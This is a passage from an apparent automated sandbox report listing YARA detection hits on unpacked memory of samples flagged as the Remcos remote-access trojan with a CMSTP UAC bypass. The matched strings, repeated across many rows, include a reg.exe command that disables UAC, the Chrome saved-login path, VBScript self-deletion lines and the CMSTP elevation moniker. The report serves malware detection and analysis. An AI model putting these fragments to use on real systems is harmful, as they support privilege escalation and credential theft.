0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
20.3.yavascript.exe.2000000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
26.3.yavascript.exe.21c0000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.3.yavascript.exe.21c0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.3.yavascript.exe.21c0000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
26.3.yavascript.exe.21c0000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
26.3.yavascript.exe.21c0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
15.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6a8:$a1: Remcos restarted by watchdog! 0x6bc20:$a3: %02i:%02i:%02i:%03i
15.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x656fc:$str_a1: C:\Windows\System32\cmd.exe 0x65678:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65678:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65b78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x663a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6576c:$str_b2: Executing file: 0x667ec:$str_b3: GetDirectListeningPort 0x66198:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66318:$str_b7: \update.vbs 0x65794:$str_b9: Downloaded file: 0x65780:$str_b10: Downloading file: 0x65824:$str_b12: Failed to upload file: 0x667b4:$str_b13: StartForward 0x667d4:$str_b14: StopForward 0x66270:$str_b15: fso.DeleteFile " 0x66204:$str_b16: On Error Resume Next 0x662a0:$str_b17: fso.DeleteFolder " 0x65814:$str_b18: Uploaded file: 0x657d4:$str_b19: Unable to delete: 0x66238:$str_b20: while fso.FileExists(" 0x65cb1:$str_c0: [Firefox StoredLogins not found]
26.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.yavascript.exe.1f80e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.yavascript.exe.1f80e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.3.yavascript.exe.2180000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.3.yavascript.exe.21c0000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x655e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6557c:$s1: CoGetObject 0x65590:$s1: CoGetObject 0x655ac:$s1: CoGetObject 0x6f538:$s1: CoGetObject 0x6553c:$s2: Elevation:Administrator!new:
26.2.yavascript.exe.730e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.yavascript.exe.730e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.yavascript.exe.730e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
26.2.yavascript.exe.730e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
26.2.yavascript.exe.730e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
26.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6a8:$a1: Remcos restarted by watchdog! 0x6bc20:$a3: %02i:%02i:%02i:%03i
20.2.yavascript.exe.1f80e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.3.ltlbVjClX9.exe.21b0000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.3.ltlbVjClX9.exe.21b0000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0.3.ltlbVjClX9.exe.21b0000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
0.2.ltlbVjClX9.exe.2130e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x69ca8:$a1: Remcos restarted by watchdog! 0x6a220:$a3: %02i:%02i:%02i:%03i
0.2.ltlbVjClX9.exe.2130e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
0.2.ltlbVjClX9.exe.2130e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
15.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
26.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x656fc:$str_a1: C:\Windows\System32\cmd.exe 0x65678:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65678:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65b78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x663a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6576c:$str_b2: Executing file: 0x667ec:$str_b3: GetDirectListeningPort 0x66198:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66318:$str_b7: \update.vbs 0x65794:$str_b9: Downloaded file: 0x65780:$str_b10: Downloading file: 0x65824:$str_b12: Failed to upload file: 0x667b4:$str_b13: StartForward 0x667d4:$str_b14: StopForward 0x66270:$str_b15: fso.DeleteFile " 0x66204:$str_b16: On Error Resume Next 0x662a0:$str_b17: fso.DeleteFolder " 0x65814:$str_b18: Uploaded file: 0x657d4:$str_b19: Unable to delete: 0x66238:$str_b20: while fso.FileExists(" 0x65cb1:$str_c0: [Firefox StoredLogins not found]
20.2.yavascript.exe.1f80e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
15.3.yavascript.exe.2180000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
26.3.yavascript.exe.21c0000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.3.yavascript.exe.21c0000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
26.3.yavascript.exe.21c0000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
15.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
20.2.yavascript.exe.1f80e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.3.yavascript.exe.2180000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
20.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
26.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x655e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6557c:$s1: CoGetObject 0x65590:$s1: CoGetObject 0x655ac:$s1: CoGetObject 0x6f538:$s1: CoGetObject 0x6553c:$s2: Elevation:Administrator!new:
0.3.ltlbVjClX9.exe.21b0000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x63cfc:$str_a1: C:\Windows\System32\cmd.exe 0x63c78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63c78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64178:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x649a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x63d6c:$str_b2: Executing file: 0x64dec:$str_b3: GetDirectListeningPort 0x64798:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x64918:$str_b7: \update.vbs 0x63d94:$str_b9: Downloaded file: 0x63d80:$str_b10: Downloading file: 0x63e24:$str_b12: Failed to upload file: 0x64db4:$str_b13: StartForward 0x64dd4:$str_b14: StopForward 0x64870:$str_b15: fso.DeleteFile " 0x64804:$str_b16: On Error Resume Next 0x648a0:$str_b17: fso.DeleteFolder " 0x63e14:$str_b18: Uploaded file: 0x63dd4:$str_b19: Unable to delete: 0x64838:$str_b20: while fso.FileExists(" 0x642b1:$str_c0: [Firefox StoredLogins not found]
15.3.yavascript.exe.2180000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.3.yavascript.exe.2180000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
20.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6a8:$a1: Remcos restarted by watchdog! 0x6bc20:$a3: %02i:%02i:%02i:%03i
0.3.ltlbVjClX9.exe.21b0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x63be8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x63b7c:$s1: CoGetObject 0x63b90:$s1: CoGetObject 0x63bac:$s1: CoGetObject 0x6db38:$s1: CoGetObject 0x63b3c:$s2: Elevation:Administrator!new:
26.3.yavascript.exe.21c0000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
20.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x656fc:$str_a1: C:\Windows\System32\cmd.exe 0x65678:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65678:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65b78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x663a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6576c:$str_b2: Executing file: 0x667ec:$str_b3: GetDirectListeningPort 0x66198:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66318:$str_b7: \update.vbs 0x65794:$str_b9: Downloaded file: 0x65780:$str_b10: Downloading file: 0x65824:$str_b12: Failed to upload file: 0x667b4:$str_b13: StartForward 